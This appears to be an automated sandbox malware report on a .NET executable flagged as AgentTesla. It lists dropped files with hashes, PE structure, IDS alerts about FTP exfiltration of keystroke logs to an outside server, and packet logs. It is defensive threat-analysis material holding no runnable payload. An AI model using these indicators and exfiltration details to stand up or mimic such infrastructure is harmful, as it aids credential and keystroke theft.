Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.3810236212315665
Encrypted:	false
SSDEEP:	48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:lGLHxv2IfLZ2KRH6OugEs
MD5:	7A5C31D328774D48CBCD5C8108EA608A
SHA1:	6570C3FDC55676ED1E8F6FA7DB0401E9F0DDB50E
SHA-256:	340522D923513A2541606E5F4844C71AED79CE5D215607B8C2F89210EED08EFB
SHA-512:	6B210B7C8048A9B448ED6C76E4A83915D236909B859D834CB51FAC34C443B898318BEB1FF2FA38B626CA9DE60DE464DD55402E3133F83F93214565B7F81D88BA
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0ahie50.43x.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jczfjfho.hp3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb50sxt2.ug4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgtvkp2m.vrw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\newapp\newapp.exe

Download File

Process:	C:\Users\user\Desktop\dhPWt112uC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	889344
Entropy (8bit):	7.656416431623408
Encrypted:	false
SSDEEP:	24576:zBXaePxOLRTgnZZSS+5VKGIUuZfEfCk7nXFGxR3X3N:9XaePxOLJgnZ0SQVKGSYCGYxRH3N
MD5:	2327E5C20B3CCE0BE582DBE461480CC2
SHA1:	42D14AE8B60E22F36F487D8C3BEE1AD43199170F
SHA-256:	97B6842B7AE2E92619F7001E81705C62395FD8D4A2D5DBFA20B47976AAA3CDD1
SHA-512:	01F3C2EE422CCB7DB9ACBEDC078D0D485508443DE3366959DF5AB9C4CD5EB67EE5D0DCA29EE45C9A09A1ADC8509E6BD4B28BDFC325C2310091E960338273009E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\|...............0.............:.... ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text...@.... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H........d...K......`........D...........................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.........0...........s......o.....".(......0...........s".....o.......0..+.........,..{.......+....,...{....o........(.......0............o ....+...0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....

C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\dhPWt112uC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.656416431623408
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	dhPWt112uC.exe
File size:	889'344 bytes
MD5:	2327e5c20b3cce0be582dbe461480cc2
SHA1:	42d14ae8b60e22f36f487d8c3bee1ad43199170f
SHA256:	97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1
SHA512:	01f3c2ee422ccb7db9acbedc078d0d485508443de3366959df5ab9c4cd5eb67ee5d0dca29ee45c9a09a1adc8509e6bd4b28bdfc325c2310091e960338273009e
SSDEEP:	24576:zBXaePxOLRTgnZZSS+5VKGIUuZfEfCk7nXFGxR3X3N:9XaePxOLJgnZ0SQVKGSYCGYxRH3N
TLSH:	FD1501582A56CC02DA955BB509B2F2B8677C6DEAB905E202DFDC7DEB7A36F001C14313
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\|...............0.............:.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	333333ab693b9b98

Static PE Info

General

Entrypoint:	0x4b113a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEB7C088D [Sat Mar 12 13:20:13 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb10e8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x29a10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xaf484	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaf140	0xaf200	a3d1d39087eacdede2a1ce67e4d9522b	False	0.9158274223768736	data	7.760942472660535	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x29a10	0x29c00	becf5ece246b74c13e56ecefb4442bc2	False	0.6746935815868264	data	7.095519563194689	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	941bca6cbe8b51c35da808d8e83e02d7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2220	0x10d8b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9989130907351854
RT_ICON	0xc2fac	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.42335561339169525
RT_ICON	0xd37d4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.5058455361360416
RT_ICON	0xd79fc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.5346473029045643
RT_ICON	0xd9fa4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.6055347091932458
RT_ICON	0xdb04c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7225177304964538
RT_GROUP_ICON	0xdb4b4	0x5a	Targa image data - Map 65536 x 3467 x 1	0.7333333333333333
RT_VERSION	0xdb510	0x314	data	0.43274111675126903
RT_MANIFEST	0xdb824	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:34:18.247210+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49747	192.254.225.136	21	TCP
2025-01-11T08:34:18.709427+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49748	192.254.225.136	49190	TCP
2025-01-11T08:34:18.715270+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49748	192.254.225.136	49190	TCP
2025-01-11T08:34:25.740138+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49752	192.254.225.136	21	TCP
2025-01-11T08:34:26.210410+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49753	192.254.225.136	45445	TCP
2025-01-11T08:34:26.217704+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49753	192.254.225.136	45445	TCP
2025-01-11T08:35:33.826452+0100	1800007	Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs	1	192.168.2.4	54658	192.254.225.136	31555	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:33:58.715464115 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:58.715528011 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:58.715584993 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:58.730299950 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:58.730319023 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.220254898 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.220324993 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:59.224868059 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:59.224888086 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.225229025 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.267416954 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:59.294862032 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:59.335361004 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.404077053 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.404144049 CET	443	49732	104.26.13.205	192.168.2.4
Jan 11, 2025 08:33:59.404192924 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:33:59.414855957 CET	49732	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:00.712846041 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:00.717722893 CET	21	49734	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:00.718102932 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:00.722702026 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:00.727500916 CET	21	49734	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:00.728343964 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:00.750329971 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:00.755173922 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:00.755595922 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:01.299359083 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.301261902 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:01.306231976 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.449145079 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.452816963 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:01.457737923 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.719630003 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.724349976 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:01.729327917 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.872483015 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:01.873909950 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:01.878820896 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.022032976 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.022197962 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.027097940 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.170084000 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.170425892 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.175399065 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.318458080 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.319071054 CET	49737	43947	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.323931932 CET	43947	49737	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.324016094 CET	49737	43947	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.324115992 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.328921080 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.792187929 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.792481899 CET	49737	43947	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.792592049 CET	49737	43947	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.797485113 CET	43947	49737	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.797501087 CET	43947	49737	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.797508955 CET	43947	49737	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.797739983 CET	43947	49737	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.797797918 CET	49737	43947	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.904354095 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.940927029 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:02.941337109 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:02.946182013 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.089545965 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.090028048 CET	49739	39651	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.094974041 CET	39651	49739	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.095050097 CET	49739	39651	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.095156908 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.100011110 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.566484928 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.567408085 CET	49739	39651	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.572557926 CET	39651	49739	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.572613001 CET	49739	39651	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.611149073 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:03.715665102 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:03.767384052 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:15.384695053 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.384728909 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:15.385318041 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.388699055 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.388717890 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:15.867474079 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:15.867584944 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.869693041 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.869699955 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:15.870057106 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:15.923568010 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.942472935 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:15.987330914 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:16.050549030 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:16.050683975 CET	443	49746	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:16.050744057 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:16.054075956 CET	49746	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:16.706573963 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:16.711597919 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:16.711679935 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.249368906 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.249723911 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.254683018 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.395706892 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.395988941 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.400856018 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.636948109 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.649594069 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.655086040 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.795767069 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.797269106 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.804136038 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.945301056 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:17.946938992 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:17.951834917 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.094849110 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.094991922 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.099802971 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.241627932 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.242228031 CET	49748	49190	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.247081995 CET	49190	49748	192.254.225.136	192.168.2.4
